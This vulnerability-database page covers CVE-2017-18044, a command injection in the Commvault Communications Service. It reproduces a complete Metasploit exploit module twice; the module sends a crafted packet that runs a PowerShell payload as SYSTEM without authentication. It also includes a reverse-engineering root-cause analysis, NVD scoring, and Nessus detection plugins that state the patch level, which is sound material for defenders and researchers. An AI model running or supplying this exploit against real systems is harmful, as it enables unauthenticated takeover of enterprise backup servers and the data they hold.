Commvault Communications Service (cvd) Command Injection
2017-12-22T15:04:13
ID MSF:EXPLOIT/WINDOWS/MISC/COMMVAULT_CMD_EXEC Type metasploit Reporter Rapid7 Modified 2020-10-02T20:00:37
Description
This module exploits a command injection vulnerability discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5 and v10). The vulnerability exists in the cvd.exe service and allows an attacker to execute arbitrary commands in the context of the service. By default, the Commvault Communications service installs and runs as SYSTEM in Windows and does not require authentication. This vulnerability was discovered in the Windows version. The Linux version wasn't tested.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for CVE-2017-18044: unauthenticated command injection in
  # the Commvault Communications Service (cvd.exe), v11 SP5 and earlier.
  # The service listens on TCP 8400 by default (see register_options) and
  # the module is marked 'Privileged', i.e. the resulting session is expected
  # to carry the service's own (SYSTEM) privileges.
  #
  # Mitigation, per the Nessus plugin data reproduced on this page: upgrade to
  # Commvault v11 SP6 with hotfix 590, or to v11 SP7 or later.
  # Detection: the request is a 4-byte length-prefixed message of type 9 whose
  # body carries a literal cmd.exe path followed by a PowerShell one-liner;
  # that combination on the cvd port is presumably a usable network/host
  # signature, though the page shows no benign traffic to compare against.
  Rank = GoodRanking
  include Msf::Exploit::Remote::Tcp   # connect / sock / disconnect and the RPORT option
  include Msf::Exploit::Powershell    # cmd_psh_payload

  # Registers module metadata (name, description, author, references,
  # platform, target/arch list, disclosure date) and the single network option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => 'Commvault Communications Service (cvd) Command Injection',
      'Description' => %q{
This module exploits a command injection vulnerability
discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
and v10). The vulnerability exists in the cvd.exe service and allows an
attacker to execute arbitrary commands in the context of the service. By
default, the Commvault Communications service installs and runs as SYSTEM in
Windows and does not require authentication. This vulnerability was discovered
in the Windows version. The Linux version wasn't tested.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
        ],
      'References' =>
        [
          ['CVE', '2017-18044'],
          ['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
        ],
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
            {
              'Arch' => [ARCH_X64, ARCH_X86]
            }
          ],
        ],
      'Privileged' => true,
      'DefaultTarget' => 0,
      'DisclosureDate' => '2017-12-12'))
    # The only option beyond the Tcp mixin defaults: cvd's default port is 8400.
    register_options([Opt::RPORT(8400)])
  end

  # Framework entry point: builds the request, sends it in a single write over
  # the Tcp mixin's socket, then hands control to the payload handler.
  #
  # Nothing is read back from the service and the class defines no `check`
  # method, so the module cannot distinguish a patched host from a vulnerable
  # one; the only feedback is whether a session arrives via `handler`.
  def exploit
    buf = build_exploit
    print_status("Connecting to Commvault Communications Service.")
    connect
    print_status("Executing payload")
    # Send the payload (one blocking write of the whole framed message)
    sock.put(buf)
    # Handle the shell
    handler
    disconnect
  end

  # Assembles the cvd message that reaches the command-execution handler.
  #
  # Wire layout as built below (all integers are 32-bit big-endian, 'I>'):
  #   [4]   length of everything that follows
  #   [8]   filler bytes from make_nops
  #   [4]   message type = 9
  #   [328] filler bytes from make_nops
  #   cmd.exe path, ';', ' /c "', <powershell one-liner>, '" && echo ', "\x00"
  #   [4]   zero
  #
  # @return [String] the complete framed message, ready for sock.put
  def build_exploit
    # Get encoded powershell of payload.
    # Note: `payload` on this line still resolves to the module's payload
    # accessor; the local string named `payload` assigned further down only
    # shadows it from that assignment onward (Ruby creates the local when the
    # parser reaches the assignment, so earlier references stay method calls).
    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
    # Remove additional cmd.exe call: keep the string from the first
    # "powershell" onward, because the packet below already supplies cmd.exe /c.
    # NOTE(review): no guard for `index` returning nil; `command[nil..-1]`
    # behaves differently across Ruby versions (beginless range vs. an
    # ArgumentError), so the failure mode is version-dependent.
    psh = "powershell"
    idx = command.index(psh)
    command = command[(idx)..-1]

    # Build packet
    cmd_path = 'C:\Windows\System32\cmd.exe'
    msg_type = 9  # the root-cause analysis on this page maps type 9 to execCmd
    zero = 0
    payload = ""  # local; shadows the payload accessor from here on (see above)
    payload += make_nops(8)           # filler
    payload += [msg_type].pack('I>')  # 32-bit big-endian message type
    payload += make_nops(328)         # filler up to the command string
    payload += cmd_path
    payload += ";"
    payload += ' /c "'
    payload += command
    payload += '" && echo '
    payload += "\x00"                 # presumably terminates the C string on the receiving side
    payload += [zero].pack('I>')

    # Add length header and payload
    # NOTE(review): String#length counts characters, so this equals the byte
    # count only while the concatenated string stays in a single-byte encoding.
    ret_data = [payload.length].pack('I>')
    ret_data += payload

    ret_data
  end
end
{"id": "MSF:EXPLOIT/WINDOWS/MISC/COMMVAULT_CMD_EXEC", "type": "metasploit", "bulletinFamily": "exploit", "title": "Commvault Communications Service (cvd) Command Injection", "description": "This module exploits a command injection vulnerability discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5 and v10). The vulnerability exists in the cvd.exe service and allows an attacker to execute arbitrary commands in the context of the service. By default, the Commvault Communications service installs and runs as SYSTEM in Windows and does not require authentication. This vulnerability was discovered in the Windows version. The Linux version wasn't tested.\n", "published": "2017-12-22T15:04:13", "modified": "2020-10-02T20:00:37", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18044", "https://www.securifera.com/advisories/sec-2017-0001/"], "cvelist": ["CVE-2017-18044"], "lastseen": "2020-10-14T07:56:07", "viewCount": 250, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2020-10-14T07:56:07", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-18044"]}, {"type": "attackerkb", "idList": ["AKB:9D676126-93A9-4EBE-AA98-AC235EE50529"]}, {"type": "nessus", "idList": ["COMMVAULT_11_SP7.NASL", "COMMVAULT_11_SP7_LOCAL.NASL"]}], "modified": "2020-10-14T07:56:07", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/commvault_cmd_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/powershell'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n 
super(update_info(info,\n 'Name' => 'Commvault Communications Service (cvd) Command Injection',\n 'Description' => %q{\n This module exploits a command injection vulnerability\n discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5\n and v10). The vulnerability exists in the cvd.exe service and allows an\n attacker to execute arbitrary commands in the context of the service. By\n default, the Commvault Communications service installs and runs as SYSTEM in\n Windows and does not require authentication. This vulnerability was discovered\n in the Windows version. The Linux version wasn't tested.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'b0yd', # @rwincey / Vulnerability Discovery and MSF module author\n ],\n 'References' =>\n [\n ['CVE', '2017-18044'],\n ['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',\n {\n 'Arch' => [ARCH_X64, ARCH_X86]\n }\n ],\n ],\n 'Privileged' => true,\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2017-12-12'))\n\n register_options([Opt::RPORT(8400)])\n\n end\n\n def exploit\n\n buf = build_exploit\n print_status(\"Connecting to Commvault Communications Service.\")\n connect\n print_status(\"Executing payload\")\n #Send the payload\n sock.put(buf)\n #Handle the shell\n handler\n disconnect\n\n end\n\n\n def build_exploit\n\n #Get encoded powershell of payload\n command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')\n #Remove additional cmd.exe call\n psh = \"powershell\"\n idx = command.index(psh)\n command = command[(idx)..-1]\n\n #Build packet\n cmd_path = 'C:\\Windows\\System32\\cmd.exe'\n msg_type = 9\n zero = 0\n payload = \"\"\n payload += make_nops(8)\n payload += [msg_type].pack('I>')\n payload += make_nops(328)\n payload += cmd_path\n payload += \";\"\n payload += ' /c \"'\n payload += 
command\n payload += '\" && echo '\n payload += \"\\x00\"\n payload += [zero].pack('I>')\n\n #Add length header and payload\n ret_data = [payload.length].pack('I>')\n ret_data += payload\n\n ret_data\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2021-02-02T06:36:41", "description": "A Command Injection issue was discovered in ContentStore/Base/CVDataPipe.dll in Commvault before v11 SP6. A certain message parsing function inside the Commvault service does not properly validate the input of an incoming string before passing it to CreateProcess. As a result, a specially crafted message can inject commands that will be executed on the target operating system. Exploitation of this vulnerability does not require authentication and can lead to SYSTEM level privilege on any system running the cvd daemon. This is a different vulnerability than CVE-2017-3195.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-19T17:29:00", "title": "CVE-2017-18044", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18044"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:commvault:commvault:11.0"], "id": "CVE-2017-18044", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-18044", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:a:commvault:commvault:11.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:commvault:commvault:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:commvault:commvault:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:a:commvault:commvault:11.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:commvault:commvault:11.0:sp5:*:*:*:*:*:*", "cpe:2.3:a:commvault:commvault:11.0:sp4:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-12-23T21:20:33", "bulletinFamily": "info", "cvelist": ["CVE-2017-18044"], "description": "A certain message parsing function inside the Commvault service does not properly validate the input of an incoming string before passing it to CreateProcess. As a result, a specially crafted message can inject commands that will be executed on the target operating system. Exploitation of this vulnerability does not require authentication and can lead to SYSTEM level privilege on any system running the cvd daemon.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:08pm UTC reported:\n\n## Introduction\n\nCommvault is a data protection and information management software; an enterprise-level data \nplatform that contains modules to back up, restore, archive, replicate, and search data.\n\nAccording to public documentation, the data is protected by installing agent software on the \nphysical or virtual hosts, which use the OS or application native APIs to protect data in a \nconsistent state. Production data is processed by the agent on client computers and backuped \nup through a data manager (the MediaAgent) to disk, tape, or cloud storage. All data \nmanagement activity in the environment is tracked by a centralized server (called CommServe), \nand can be managed by administrators through a central user interface. End users can access \nprotected data using web browsers or mobile devices.\n\nOne of the base services of Commvault is vulnerable to a remote command injection attack, \nspecifically the cvd service. 
It was a Metasploit submission by [@rwincey as PR #9340](<https://github.com/rapid7/metasploit-framework/pull/9340>).\n\n## Vulnerable Application\n\nAccording to the public advisory, Commvault v11 SP5 or prior are vulnerable to this \nvulnerability.\n\nThe specific vulnerable version I tested was 11.0.80.0, and the software was obtained from \nthe Metasploit contributor @rwincey. The software is available from our Google Drive at:\n\n**Vulnerable Apps \u2013> Commvault \u2013> Commvault_R80_SP5_22September16.exe**.\n\nThe version of the vulnerable DLL is:\n \n \n Image path: C:\\Program Files\\Commvault\\ContentStore\\Base\\CVDataPipe.dll\n Image name: CVDataPipe.dll\n Timestamp: Wed Dec 21 11:59:21 2016 (585AC2F9)\n CheckSum: 002ED404\n ImageSize: 002F0000\n File version: 11.80.50.60437\n Product version: 11.0.0.0\n File flags: 1 (Mask 3F) Debug\n File OS: 40004 NT Win32\n File type: 1.0 App\n File date: 00000000.00000000\n Translations: 0409.04b0\n CompanyName: Commvault\n ProductName: Commvault\n InternalName: CVDataPipe\n OriginalFilename: CVDataPipe.dll\n ProductVersion: 11.0.0.0\n FileVersion: 11.80.50.60437\n PrivateBuild:\n SpecialBuild:\n FileDescription:\n LegalCopyright: Copyright (c) 2000-2016\n LegalTrademarks:\n Comments:\n \n\n## Root Cause Analysis\n\nBased on the information we have from the pull request, the vulnerability is a command injection, so \nthat\u2019s where we begin reversing.\n\nUsually, there are two ways to execute a command in a C/C++ application, one of them is `WinExec()`, \nand the other one is `CreateProcess()`:\n \n \n BOOL WINAPI CreateProcess(\n _In_opt_ LPCTSTR lpApplicationName,\n _Inout_opt_ LPTSTR lpCommandLine,\n _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,\n _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,\n _In_ BOOL bInheritHandles,\n _In_ DWORD dwCreationFlags,\n _In_opt_ LPVOID lpEnvironment,\n _In_opt_ LPCTSTR lpCurrentDirectory,\n _In_ LPSTARTUPINFO lpStartupInfo,\n _Out_ LPPROCESS_INFORMATION 
lpProcessInformation\n );\n \n \n\nSince `CreateProcess()` is meant to replace `WinExec()` according to Microsoft, we can create a \nbreak point there fist in our debugger (WinDBG), and we hit it:\n \n \n 0:044> g\n Breakpoint 3 hit\n kernel32!CreateProcessA:\n 00000000`76fe8730 4c8bdc mov r11,rsp\n \n\nLooking at the callstack of this `kernel32!CreateProcessA`, we already have a pretty good idea \nlocating the vulnerability:\n \n \n 0:044> k\n Child-SP RetAddr Call Site\n 00000000`11a36b78 000007fe`f378a40f kernel32!CreateProcessA\n 00000000`11a36b80 000007fe`f377714e CVDataPipe!execCmd+0x7af\n 00000000`11a3f340 000007fe`f3777a69 CVDataPipe!CVDMessageHandler+0x78e\n 00000000`11a3fbd0 000007fe`f9cdc58d CVDataPipe!CVDMessageHandler+0x10a9\n 00000000`11a3fd40 000007fe`f9cdc1b1 CvBasicLib!CvThreadPool::th_defaultWorkerObj+0x3cd\n 00000000`11a3fe40 000007fe`f9cd2073 CvBasicLib!CvThreadPool::th_defaultWorker+0x51\n 00000000`11a3fe90 000007fe`f9a84f7f CvBasicLib!CvThread::~CvThread+0x63\n 00000000`11a3fee0 000007fe`f9a85126 MSVCR120!_callthreadstartex+0x17 [f:\\dd\\vctools\\crt\\crtw32\\startup\\threadex.c @ 376]\n 00000000`11a3ff10 00000000`76f6f56d MSVCR120!_threadstartex+0x102 [f:\\dd\\vctools\\crt\\crtw32\\startup\\threadex.c @ 354]\n 00000000`11a3ff40 00000000`770a3281 kernel32!BaseThreadInitThunk+0xd\n 00000000`11a3ff70 00000000`00000000 ntdll!RtlUserThreadStart+0x1d\n \n\nThere are two things that are interesting. One of them is `CVDataPipe!CVDMessageHandler`, and the \nother one is `CVDataPipe!execCmd`.\n\n`CVDataPipe!CVDMessageHandler` is basically a function that handles our packet\u2019s message type. 
\nThe Metasploit exploit specifically sends a code of `9h`, which is the message type for `execCmd`:\n \n \n .text:0000000180147103 loc_180147103: ; CODE XREF: CVDMessageHandler(int,selectStruct_t *,CQiSocket,void *):loc_180146D78j\n .text:0000000180147103 lea rax, [rsp+888h+var_220] ; jumptable 0000000180146D78 case 9\n .text:000000018014710B mov [rsp+888h+var_600], rax\n .text:0000000180147113 mov rdx, [rsp+888h+sock]\n .text:000000018014711B mov rcx, [rsp+888h+var_600]\n .text:0000000180147123 call cs:??0CQiSocket@@QEAA@AEBV0@@Z ; CQiSocket::CQiSocket(CQiSocket const &)\n .text:0000000180147129 mov [rsp+888h+var_5F0], rax\n .text:0000000180147131 mov r8, [rsp+888h+arg_18]\n .text:0000000180147139 mov rdx, [rsp+888h+var_5F0]\n .text:0000000180147141 mov rcx, [rsp+888h+structSelect]\n .text:0000000180147149 call ?execCmd@@YAXPEAUselectStruct_t@@VCQiSocket@@PEAX@Z ; execCmd(selectStruct_t *,CQiSocket,void *)\n \n\nIf we take a closer look at the `execCmd` function, we can tell the purpose of it is for processes such as:\n\n * ifind (For restoring purposes) \n\n * BackupShadow.exe (For archiving) \n\n * Pub (Map file) \n\n * createIndex (A Commvault process for building index) \n\n \n \n .text:0000000180159F1B loc_180159F1B: ; CODE XREF: execCmd(selectStruct_t *,CQiSocket,void *)+261j\n .text:0000000180159F1B ; DATA XREF: .rdata:0000000180286258o\n .text:0000000180159F1B lea rdx, aIfind ; \"ifind\"\n .text:0000000180159F22 lea rcx, [rsp+87B8h+ApplicationName] ; Str\n .text:0000000180159F2A call cs:strstr\n .text:0000000180159F30 test rax, rax\n .text:0000000180159F33 jnz short loc_180159F6D\n .text:0000000180159F35 lea rdx, aBackupshadow_e ; \"BackupShadow.exe\"\n .text:0000000180159F3C lea rcx, [rsp+87B8h+ApplicationName] ; Str\n .text:0000000180159F44 call cs:strstr\n .text:0000000180159F4A test rax, rax\n .text:0000000180159F4D jnz short loc_180159F6D\n .text:0000000180159F4F lea rdx, aPub ; \"Pub\"\n .text:0000000180159F56 lea rcx, [rsp+87B8h+ApplicationName] ; 
Str\n .text:0000000180159F5E call cs:strstr\n ...\n .text:000000018015A0BA loc_18015A0BA: ; CODE XREF: execCmd(selectStruct_t *,CQiSocket,void *)+307j\n .text:000000018015A0BA lea rdx, aCreateindex ; \"createIndex\"\n .text:000000018015A0C1 lea rcx, [rsp+87B8h+ApplicationName] ; Str\n .text:000000018015A0C9 call cs:strstr\n .text:000000018015A0CF test rax, rax\n .text:000000018015A0D2 jz loc_18015A220\n \n\nHowever, if you don\u2019t call one of these processes, the `exeCmd` will assume you want to run your \ncustom process, and pass it to `CreateProcess` anyway:\n \n \n .text:000000018015A361 loc_18015A361: ; CODE XREF: execCmd(selectStruct_t *,CQiSocket,void *)+675j\n .text:000000018015A361 call cs:GetEnvironmentStrings\n .text:000000018015A367 mov [rsp+87B8h+var_86A8], rax\n .text:000000018015A36F lea rax, [rsp+87B8h+StartupInfo]\n .text:000000018015A377 mov rdi, rax\n .text:000000018015A37A xor eax, eax\n .text:000000018015A37C mov ecx, 68h\n .text:000000018015A381 rep stosb\n .text:000000018015A383 mov [rsp+87B8h+StartupInfo.cb], 68h\n .text:000000018015A38E lea rax, [rsp+87B8h+ProcessInformation]\n .text:000000018015A396 mov rdi, rax\n .text:000000018015A399 xor eax, eax\n .text:000000018015A39B mov ecx, 18h\n .text:000000018015A3A0 rep stosb\n .text:000000018015A3A2 mov [rsp+87B8h+StartupInfo.dwFlags], 1\n .text:000000018015A3AD xor eax, eax\n .text:000000018015A3AF mov [rsp+87B8h+StartupInfo.wShowWindow], ax\n .text:000000018015A3B7 lea rax, [rsp+87B8h+ProcessInformation]\n .text:000000018015A3BF mov [rsp+87B8h+lpProcessInformation], rax ; lpProcessInformation\n .text:000000018015A3C4 lea rax, [rsp+87B8h+StartupInfo]\n .text:000000018015A3CC mov [rsp+87B8h+lpStartupInfo], rax ; lpStartupInfo\n .text:000000018015A3D1 mov [rsp+87B8h+lpCurrentDirectory], 0 ; lpCurrentDirectory\n .text:000000018015A3DA mov [rsp+87B8h+lpEnvironment], 0 ; lpEnvironment\n .text:000000018015A3E3 mov [rsp+87B8h+dwCreationFlags], 10h ; dwCreationFlags\n .text:000000018015A3EB mov 
[rsp+87B8h+bInheritHandles], 0 ; bInheritHandles\n .text:000000018015A3F3 xor r9d, r9d ; lpThreadAttributes\n .text:000000018015A3F6 xor r8d, r8d ; lpProcessAttributes\n .text:000000018015A3F9 lea rdx, [rsp+87B8h+CommandLine] ; lpCommandLine\n .text:000000018015A401 lea rcx, [rsp+87B8h+ApplicationName] ; lpApplicationName\n .text:000000018015A409 call cs:CreateProcessA\n \n\nIt is unclear whether allowing an arbitrary custom process is intentional or not, it is unsafe \nanyway considering the cvd process binds to 0.0.0.0, so anybody can access to it.\n", "modified": "2020-10-19T00:00:00", "published": "2018-01-19T00:00:00", "id": "AKB:9D676126-93A9-4EBE-AA98-AC235EE50529", "href": "https://attackerkb.com/topics/nGwgS9snz5/cve-2017-18044---commvault-communications-service-execcmd-vulnerability", "type": "attackerkb", "title": "CVE-2017-18044 - Commvault Communications Service execCmd Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-01T01:41:27", "description": "The version of Commvault running on the remote web server is 11 prior\nto 11 SP7. It is, therefore, affected by multiple vulnerabilities:\n\n - A buffer overflow vulnerability exists in the Commvault Edge \n communication service (cvd). An remote, unauthenticated \n attacker could achieve arbitrary code execution by sending \n a specially crafted packet. (CVE-2017-3195)\n\n - A command injection vulnerability exists in CVDataPipe.dll. \n An unauthenticated, remote attacker can exploit this, via \n a specially crafted message to CreateProcess, to execute \n arbitrary commands as SYSTEM. 
(CVE-2017-18044)", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-25T00:00:00", "title": "Commvault 11 < 11 SP7 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-18044", "CVE-2017-3195"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:commvault:commvault"], "id": "COMMVAULT_11_SP7_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/126988", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126988);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/08/12 17:35:39\");\n\n script_cve_id(\"CVE-2017-3195\",\"CVE-2017-18044\");\n script_bugtraq_id(96941);\n script_xref(name:\"IAVA\", value:\"2019-A-0181\");\n\n script_name(english:\"Commvault 11 < 11 SP7 Multiple Vulnerabilities\");\n script_summary(english:\"Checks for the product version and service pack.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Commvault install running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Commvault running on the remote web server is 11 prior\nto 11 SP7. It is, therefore, affected by multiple vulnerabilities:\n\n - A buffer overflow vulnerability exists in the Commvault Edge \n communication service (cvd). An remote, unauthenticated \n attacker could achieve arbitrary code execution by sending \n a specially crafted packet. (CVE-2017-3195)\n\n - A command injection vulnerability exists in CVDataPipe.dll. \n An unauthenticated, remote attacker can exploit this, via \n a specially crafted message to CreateProcess, to execute \n arbitrary commands as SYSTEM. 
(CVE-2017-18044)\");\n # https://www.securifera.com/advisories/cve-2017-18044/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f582085c\");\n # http://kb.commvault.com/article/SEC0013\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e7d23884\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Commvault v11 SP6 and install hotfix 590, v11 SP7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3195\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Commvault Communications Service (cvd) Command Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:commvault:commvault\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"commvault_win_installed.nbin\");\n script_require_keys(\"installed_sw/Commvault\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\napp_info = vcf::commvault::get_app_info_windows();\n\nconstraints = [{\"min_version\" : \"11\", \"fixed_version\": \"11.0.0.6.590\", \"fixed_display\":\"11 SP6 & hotfix 590 / 11 SP7\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, strict:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T01:41:27", "description": "The version of Commvault running on the remote web server is 11 prior\nto 11 SP7. It is, therefore, affected by multiple vulnerabilities:\n\n - A buffer overflow vulnerability exists in the Commvault Edge \n communication service (cvd). An remote, unauthenticated \n attacker could achieve arbitrary code execution by sending \n a specially crafted packet. (CVE-2017-3195)\n\n - A command injection vulnerability exists in CVDataPipe.dll. \n An unauthenticated, remote attacker can exploit this, via \n a specially crafted message to CreateProcess, to execute \n arbitrary commands as SYSTEM. 
(CVE-2017-18044)", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-07T00:00:00", "title": "Commvault 11 < 11 SP7 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-18044", "CVE-2017-3195"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:commvault:commvault"], "id": "COMMVAULT_11_SP7.NASL", "href": "https://www.tenable.com/plugins/nessus/125782", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125782);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/07/25 7:07:22\");\n\n script_cve_id(\"CVE-2017-3195\",\"CVE-2017-18044\");\n script_bugtraq_id(96941);\n script_xref(name:\"IAVA\", value:\"2019-A-0181\");\n\n script_name(english:\"Commvault 11 < 11 SP7 Multiple Vulnerabilities\");\n script_summary(english:\"Checks for the product version and service pack.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Commvault install running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Commvault running on the remote web server is 11 prior\nto 11 SP7. It is, therefore, affected by multiple vulnerabilities:\n\n - A buffer overflow vulnerability exists in the Commvault Edge \n communication service (cvd). An remote, unauthenticated \n attacker could achieve arbitrary code execution by sending \n a specially crafted packet. (CVE-2017-3195)\n\n - A command injection vulnerability exists in CVDataPipe.dll. \n An unauthenticated, remote attacker can exploit this, via \n a specially crafted message to CreateProcess, to execute \n arbitrary commands as SYSTEM. 
(CVE-2017-18044)\");\n # https://www.securifera.com/advisories/cve-2017-18044/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f582085c\");\n # http://kb.commvault.com/article/SEC0013\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e7d23884\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Commvault v11 SP6 and install hotfix 590, v11 SP7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3195\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Commvault Communications Service (cvd) Command Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", 